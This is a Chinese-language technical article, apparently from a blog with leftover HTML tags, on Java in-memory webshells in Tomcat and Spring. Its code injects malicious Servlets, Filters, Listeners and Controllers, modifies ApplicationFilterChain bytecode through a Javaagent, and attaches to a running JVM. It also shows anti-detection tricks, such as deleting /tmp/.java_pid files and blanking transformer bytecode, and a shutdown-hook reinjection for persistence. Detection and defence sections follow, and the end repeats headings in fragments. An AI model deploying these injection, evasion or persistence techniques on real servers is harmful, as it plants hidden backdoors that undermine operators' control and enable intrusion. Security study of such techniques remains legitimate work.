Java内存马技术全面解析与防御指南<\/h1>

一、Java内存马概述<\/h2>
Java内存马是一种无落地文件、运行在内存中的后门木马技术，具有隐蔽性强、难以检测的特点。与传统的WebShell相比，内存马不依赖磁盘文件，仅存在于内存中，通常服务器重启即可消除。<\/p>

内存马分类<\/h3>

基于动态添加Servlet组件的内存马<\/strong><\/p>

通过动态注册Servlet、Filter或Listener实现<\/li>
主要针对Tomcat等Servlet容器<\/li> <\/ul> <\/li>

基于动态添加框架组件的内存马<\/strong><\/p>

针对Spring、SpringBoot等框架<\/li>
如动态注册Controller<\/li> <\/ul> <\/li>

基于Javaagent和Javassist技术的内存马<\/strong><\/p>

通过Instrumentation API修改字节码<\/li>
通用性强，不依赖特定URL路径<\/li> <\/ul> <\/li> <\/ol>
二、技术基础<\/h2>
Tomcat核心组件<\/h3>

容器层级结构<\/strong><\/p>

Engine → Host → Context → Wrapper<\/li>
StandardContext对象是关键控制点<\/li> <\/ul> <\/li>

Servlet三大组件<\/strong><\/p>

Servlet：处理请求的核心组件<\/li>
Filter：请求过滤器，形成FilterChain<\/li>
Listener：事件监听器<\/li> <\/ul> <\/li>

StandardContext获取方法<\/strong><\/p>
\/\/ 通过request获取 <\/span><\/span><\/span><\/span>ServletContext servletContext =<\/span> request.<\/span>getServletContext<\/span>();<\/span> <\/span><\/span>Field appctx =<\/span> servletContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span> <\/span><\/span>appctx.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>ApplicationContext applicationContext =<\/span> (<\/span>ApplicationContext)<\/span>appctx.<\/span>get<\/span>(<\/span>servletContext);<\/span> <\/span><\/span>Field stdctx =<\/span> applicationContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span> <\/span><\/span>stdctx.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span>stdctx.<\/span>get<\/span>(<\/span>applicationContext);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 通过线程上下文获取 <\/span><\/span><\/span><\/span>WebappClassLoaderBase webappClassLoaderBase =<\/span> (<\/span>WebappClassLoaderBase)<\/span>Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span> <\/span><\/span>StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span>webappClassLoaderBase.<\/span>getResources<\/span>().<\/span>getContext<\/span>();<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> Javaagent技术<\/h3> Javaagent分为两种模式：<\/p> premain<\/strong>：主程序运行前加载<\/li> agentmain<\/strong>：主程序运行后动态加载（内存马常用）<\/li> <\/ol> 关键类：<\/p> java.lang.instrument.Instrumentation<\/code><\/li> java.lang.instrument.ClassFileTransformer<\/code><\/li> <\/ul> Javassist技术<\/h3> 动态修改字节码的库，主要类：<\/p> ClassPool<\/code>：类池<\/li> CtClass<\/code>：表示类<\/li> CtMethod<\/code>：表示方法<\/li> CtField<\/code>：表示字段<\/li> <\/ul> 三、内存马实现技术<\/h2> 1. 动态注册Servlet组件<\/h3> 动态注册Servlet示例<\/h4> <% \/\/ 获取StandardContext ServletContext servletContext = request.getSession().getServletContext(); Field appctx = servletContext.getClass().getDeclaredField("context"); appctx.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext)appctx.get(servletContext); Field stdctx = applicationContext.getClass().getDeclaredField("context"); stdctx.setAccessible(true); StandardContext standardContext = (StandardContext)stdctx.get(applicationContext); \/\/ 创建恶意Servlet Servlet servlet = new Servlet() { @Override public void service(ServletRequest req, ServletResponse res) throws IOException { String cmd = req.getParameter("cmd"); \/\/ 命令执行逻辑... } \/\/ 其他方法实现... }; \/\/ 创建Wrapper并注册 org.apache.catalina.Wrapper newWrapper = standardContext.createWrapper(); newWrapper.setName("memshell"); newWrapper.setServlet(servlet); standardContext.addChild(newWrapper); standardContext.addServletMappingDecoded("\/shell", "memshell"); %> <\/code><\/pre> 动态注册Filter示例<\/h4> <% \/\/ 获取StandardContext同上... \/\/ 创建恶意Filter Filter filter = new Filter() { @Override public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) throws IOException { if (req.getParameter("cmd") != null) { \/\/ 命令执行逻辑... return; } chain.doFilter(req, res); } \/\/ 其他方法实现... }; \/\/ 创建FilterDef和FilterMap FilterDef filterDef = new FilterDef(); filterDef.setFilter(filter); filterDef.setFilterName("memshell"); standardContext.addFilterDef(filterDef); FilterMap filterMap = new FilterMap(); filterMap.addURLPattern("\/*"); filterMap.setFilterName("memshell"); standardContext.addFilterMapBefore(filterMap); %> <\/code><\/pre> 动态注册Listener示例<\/h4> <% \/\/ 获取StandardContext同上... \/\/ 创建恶意Listener ServletRequestListener listener = new ServletRequestListener() { @Override public void requestDestroyed(ServletRequestEvent sre) { HttpServletRequest req = (HttpServletRequest)sre.getServletRequest(); if (req.getParameter("cmd") != null) { \/\/ 命令执行逻辑... } } \/\/ 其他方法实现... }; standardContext.addApplicationEventListener(listener); %> <\/code><\/pre> 2. 动态注册框架组件（SpringBoot）<\/h3> @Controller<\/span> <\/span><\/span>public<\/span> class<\/span> NoshellController<\/span> {<\/span> <\/span><\/span> @RequestMapping<\/span>(<\/span>"\/noshell"<\/span>)<\/span> <\/span><\/span> public<\/span> void<\/span> noshell<\/span>(<\/span>HttpServletRequest request)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 获取Spring上下文 <\/span><\/span><\/span><\/span> WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder <\/span><\/span> .<\/span>currentRequestAttributes<\/span>()<\/span> <\/span><\/span> .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span> <\/span><\/span> <\/span><\/span> RequestMappingHandlerMapping mappingHandlerMapping =<\/span> context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取恶意方法 <\/span><\/span><\/span><\/span> Method method =<\/span> Evil.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"test"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 配置映射信息 <\/span><\/span><\/span><\/span> PatternsRequestCondition url =<\/span> new<\/span> PatternsRequestCondition(<\/span>"\/shell"<\/span>);<\/span> <\/span><\/span> RequestMethodsRequestCondition ms =<\/span> new<\/span> RequestMethodsRequestCondition();<\/span> <\/span><\/span> RequestMappingInfo info =<\/span> new<\/span> RequestMappingInfo(<\/span>url,<\/span> ms,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 注册Controller <\/span><\/span><\/span><\/span> Evil injectToController =<\/span> new<\/span> Evil();<\/span> <\/span><\/span> mappingHandlerMapping.<\/span>registerMapping<\/span>(<\/span>info,<\/span> injectToController,<\/span> method);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> class<\/span> Evil<\/span> {<\/span> <\/span><\/span> public<\/span> void<\/span> test<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 命令执行逻辑... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. Javaagent型内存马<\/h3> Agent实现<\/h4> public<\/span> class<\/span> Agentthing<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> agentmain<\/span>(<\/span>String agentArgs,<\/span> Instrumentation inst)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> inst.<\/span>addTransformer<\/span>(<\/span>new<\/span> Transformerthings(),<\/span> true<\/span>);<\/span> <\/span><\/span> for<\/span> (<\/span>Class cl :<\/span> inst.<\/span>getAllLoadedClasses<\/span>())<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>cl.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"org.apache.catalina.core.ApplicationFilterChain"<\/span>))<\/span> {<\/span> <\/span><\/span> inst.<\/span>retransformClasses<\/span>(<\/span>cl);<\/span> \/\/ 或redefineClasses <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Transformerthings<\/span> implements<\/span> ClassFileTransformer {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> byte<\/span>[]<\/span> transform<\/span>(<\/span>ClassLoader loader,<\/span> String className,<\/span> <\/span><\/span> Class<?><\/span> classBeingRedefined,<\/span> ProtectionDomain protectionDomain,<\/span> <\/span><\/span> byte<\/span>[]<\/span> classfileBuffer)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"org\/apache\/catalina\/core\/ApplicationFilterChain"<\/span>))<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> ClassPool cp =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span> <\/span><\/span> CtClass cc =<\/span> cp.<\/span>get<\/span>(<\/span>"org.apache.catalina.core.ApplicationFilterChain"<\/span>);<\/span> <\/span><\/span> CtMethod m =<\/span> cc.<\/span>getDeclaredMethod<\/span>(<\/span>"internalDoFilter"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 插入恶意代码 <\/span><\/span><\/span><\/span> m.<\/span>insertBefore<\/span>(<\/span>"javax.servlet.http.HttpServletRequest req = $1;"<\/span> +<\/span> <\/span><\/span> "String cmd = req.getParameter(\"cmd\");"<\/span> +<\/span> <\/span><\/span> "if(cmd != null) {"<\/span> +<\/span> <\/span><\/span> " \/\/ 命令执行逻辑..."<\/span> +<\/span> <\/span><\/span> "}"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> return<\/span> cc.<\/span>toBytecode<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>Attach实现<\/h4> public<\/span> class<\/span> Attachthing<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> String pid =<\/span> getTomcatPid();<\/span> \/\/ 通过jps获取Tomcat PID <\/span><\/span><\/span><\/span> VirtualMachine vm =<\/span> VirtualMachine.<\/span>attach<\/span>(<\/span>pid);<\/span> <\/span><\/span> vm.<\/span>loadAgent<\/span>(<\/span>"agent.jar"<\/span>);<\/span> <\/span><\/span> vm.<\/span>detach<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、主流工具分析<\/h2> 冰蝎内存马实现特点<\/h3> 使用Javaagent技术实现<\/li> 通过redefineClasses<\/code>方法修改字节码<\/li> 主要修改jakarta.servlet.http.HttpServlet<\/code>类<\/li> 实现防检测功能（删除\/tmp\/.java_pid*<\/code>文件）<\/li> <\/ol> 哥斯拉内存马实现特点<\/h3> 使用动态注册Servlet方式<\/li> 首次连接加载完整payload<\/li> 后续通过加密传输函数名和参数调用<\/li> 可动态卸载内存马<\/li> <\/ol> 五、检测与查杀技术<\/h2> 1. Javaagent型内存马检测<\/h3> 针对retransformClasses实现的检测<\/h4> public<\/span> class<\/span> ScannerAgent<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> agentmain<\/span>(<\/span>String args,<\/span> Instrumentation inst)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> inst.<\/span>addTransformer<\/span>(<\/span>new<\/span> ScannerTransformer(),<\/span> true<\/span>);<\/span> <\/span><\/span> inst.<\/span>retransformClasses<\/span>(<\/span>ApplicationFilterChain.<\/span>class<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> ScannerTransformer<\/span> implements<\/span> ClassFileTransformer {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> byte<\/span>[]<\/span> transform<\/span>(<\/span>ClassLoader loader,<\/span> String className,<\/span> <\/span><\/span> Class<?><\/span> classBeingRedefined,<\/span> byte<\/span>[]<\/span> classfileBuffer)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"org\/apache\/catalina\/core\/ApplicationFilterChain"<\/span>))<\/span> {<\/span> <\/span><\/span> \/\/ 对比当前字节码与原始字节码 <\/span><\/span><\/span><\/span> byte<\/span>[]<\/span> original =<\/span> getOriginalBytecode();<\/span> <\/span><\/span> if<\/span> (!<\/span>Arrays.<\/span>equals<\/span>(<\/span>classfileBuffer,<\/span> original))<\/span> {<\/span> <\/span><\/span> return<\/span> original;<\/span> \/\/ 恢复原始字节码 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>针对redefineClasses实现的检测<\/h4> 使用sa-jdi.jar<\/code>工具：<\/p> java -cp sa-jdi.jar sun.jvm.hotspot.HSDB <\/span><\/span><\/code><\/pre>通过HSDB工具可以dump出被修改的类字节码。<\/p> 2. Servlet\/Filter型内存马检测<\/h3> 检测思路：<\/p> 检查所有已加载类中继承Servlet\/Filter\/Listener<\/code>的类<\/li> 分析类名和关键方法字节码中的可疑特征<\/li> 检查MBean注册情况（可被绕过）<\/li> <\/ol> 3. 通用检测方法<\/h3> Javaagent扫描<\/strong>：扫描所有已加载类<\/li> 字节码特征检测<\/strong>：查找Runtime、ProcessBuilder等调用<\/li> 行为监控<\/strong>：监控动态组件注册行为<\/li> MBean检查<\/strong>：检查异常的Filter\/Servlet注册<\/li> <\/ol> 六、反查杀技术<\/h2> 1. 冰蝎防检测技术<\/h3> 删除\/tmp\/.java_pid*<\/code>文件，阻止后续Agent注入：<\/p> \/\/ 在agentmain方法中 <\/span><\/span><\/span><\/span>if<\/span> (<\/span>isAntiAgent)<\/span> {<\/span> <\/span><\/span> new<\/span> File(<\/span>"\/tmp\/.java_pid"<\/span> +<\/span> pid).<\/span>delete<\/span>();<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2. 周瑜内存马技术<\/h3> 拦截ClassFileTransformer<\/code>实现类：<\/p> \/\/ 在transform方法中 <\/span><\/span><\/span><\/span>if<\/span> (<\/span>className.<\/span>equals<\/span>(<\/span>"java\/lang\/instrument\/ClassFileTransformer"<\/span>))<\/span> {<\/span> <\/span><\/span> return<\/span> new<\/span> byte<\/span>[<\/span>0<\/span>];<\/span> \/\/ 清空字节码 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>七、持久化与复活技术<\/h2> ShutdownHook复活技术<\/h3> public<\/span> class<\/span> Agentthing<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> agentmain<\/span>(<\/span>String args,<\/span> Instrumentation inst)<\/span> {<\/span> <\/span><\/span> \/\/ 注册关机钩子 <\/span><\/span><\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>addShutdownHook<\/span>(<\/span>new<\/span> Thread(()<\/span> -><\/span> {<\/span> <\/span><\/span> \/\/ 将agent保存到文件 <\/span><\/span><\/span><\/span> saveToFile();<\/span> <\/span><\/span> \/\/ 重启时重新加载 <\/span><\/span><\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"java -jar inject.jar"<\/span>);<\/span> <\/span><\/span> }));<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>八、防御建议<\/h2> 禁用动态注册<\/strong>：限制Servlet\/Filter的动态注册能力<\/li> Agent白名单<\/strong>：控制Javaagent的加载<\/li> RASP防护<\/strong>：部署运行时应用自我保护<\/li> 权限控制<\/strong>：严格限制Web应用权限<\/li> 补丁管理<\/strong>：及时修复反序列化等漏洞<\/li> 监控措施<\/strong>：监控VirtualMachine.attach<\/code>调用<\/li> 监控\/tmp\/.java_pid*<\/code>文件操作<\/li> 监控异常的类修改行为<\/li> <\/ul> <\/li> <\/ol> 九、总结<\/h2> Java内存马技术是Web安全领域的尖端攻防技术，涉及：<\/p> Servlet容器原理<\/li> Java字节码操作<\/li> JVM Attach机制<\/li> 框架内部机制<\/li> <\/ul> 防御需要从多个层面构建防护体系，结合静态防护和动态监控，才能有效应对内存马威胁。<\/p>

Java内存马技术全面解析与防御指南<\/h1>

一、Java内存马概述<\/h2> Java内存马是一种无落地文件、运行在内存中的后门木马技术，具有隐蔽性强、难以检测的特点。与传统的WebShell相比，内存马不依赖磁盘文件，仅存在于内存中，通常服务器重启即可消除。<\/p>

二、技术基础<\/h2>

三、内存马实现技术<\/h2>

1. 动态注册Servlet组件<\/h3>

3. Javaagent型内存马<\/h3>

四、主流工具分析<\/h2>

五、检测与查杀技术<\/h2>

1. Javaagent型内存马检测<\/h3>

六、反查杀技术<\/h2>

七、持久化与复活技术<\/h2>

一、Java内存马概述<\/h2>
Java内存马是一种无落地文件、运行在内存中的后门木马技术，具有隐蔽性强、难以检测的特点。与传统的WebShell相比，内存马不依赖磁盘文件，仅存在于内存中，通常服务器重启即可消除。<\/p>